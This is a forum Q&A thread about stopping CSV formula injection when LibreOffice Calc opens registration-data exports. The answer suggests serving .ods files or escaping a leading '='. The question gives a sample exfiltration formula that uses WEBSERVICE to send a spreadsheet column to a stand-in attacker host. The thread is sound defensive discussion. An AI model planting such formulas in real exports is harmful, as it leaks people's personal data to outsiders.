We will be migrating from Ask to Discourse on the first week of August, read the details here

Ask Your Question
0

Default format quoted text from csv as text.

asked 2020-05-03 15:37:47 +0200

jklaassen gravatar image

updated 2020-05-04 01:52:41 +0200

We have a web application, the backend of which allows batch downloading csvs with e.g. data of the people registered on our site.

When these csvs are opened in libreoffice calc, we would preferably not have data in the csv be interpreted as formulas, as this might leak data from the spreadsheet to unknown sources (For example if someone wrote =WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000)) in one of the cells, the data in column U will be leaked to evil.site. If multiple such entries are entered for different columns, we have a big problem.)

Indeed one does get a message saying "Confirmation This file contains links to other files. Should they be updated?", where clicking no will not leak the data. However, our backend users might very well click yes sometimes, as I cannot tell all our current and future backend users to watch out for this button.

This problem is easily avoided with the Format quoted field as text button in the Text Import window. However, if a backend user has opened a different csv with this option disabled, the next time he/she will open a sensitive csv, this option is turned of. Is it possible to have this option _always_ turned on, i.e. that the end user _always_ has to willingly make the insecure decision himself?

EDIT: thank you four your reply. So to be clear: we have front end users ('customers') and back end users ('organisers') and the organisers can download csvs with the info that the customers have filled in in the registration form on the front end. The malicious code gets inserted if an evil customer fills it in in one of the fields on the online form. Now for the organisers to do what they want to do with the data, it is convenient to have it all in one manageable file that can be opened by several applications of the organisers choice, e.g. vim, less, gedit, geany, libreoffice, Google sheats (although I would rather not have Google know all our data) etc. I would rather not dictate our organisers to use libreoffice or a similar program that can handle ods files, I myself prefer gedit. However if the organisers choose to open the csv with libreoffice (and most of them do), I would like it if the safe option ( force all fields to type text ) is the default, such that I do not have to explain that they should watch this one button on the import screen. It would be better if the button would always default to the safe option, instead of remembering the previous setting, and I am asking how to make libreoffice default to this (clearly safer) setting.

So I am not asking if it is possible to handle the csv safely despite this setting being unsafe, I am asking how I can make the libreoffice application use the safe option per default (at least on the organisers' machines, where I ... (plus)

edit retag flag offensive close merge delete

1 Answer

Sort by » oldest newest most voted
0

answered 2020-05-03 23:07:39 +0200

erAck gravatar image

updated 2020-05-04 02:40:52 +0200

Are you saying that your web application could generate such malicious formula expression into the CSV that users can download or is this just a hypothetical made-up problem?

Anyway, this can not be prevented in CSV if the field is not forced to type text. You'd be better off if your process did not hand out CSV files but ODF .ods spreadsheet documents. You could even convert a CSV to .ods on server side using LibreOffice (or unoconv) with proper column import settings and hand the .ods out as download.

Update 2020-05-04T02:40+02:00

The best probably would be to preprocess the CSV or even the data it is generated from and escape formula expressions that start with a = equal character by inserting any other character in front, by convention, if allowed data permits and shouldn't start with a = character..

edit flag offensive delete link more
Login/Signup to Answer

Question Tools

1 follower

Stats

Asked: 2020-05-03 15:37:47 +0200

Seen: 161 times

Last updated: May 04 '20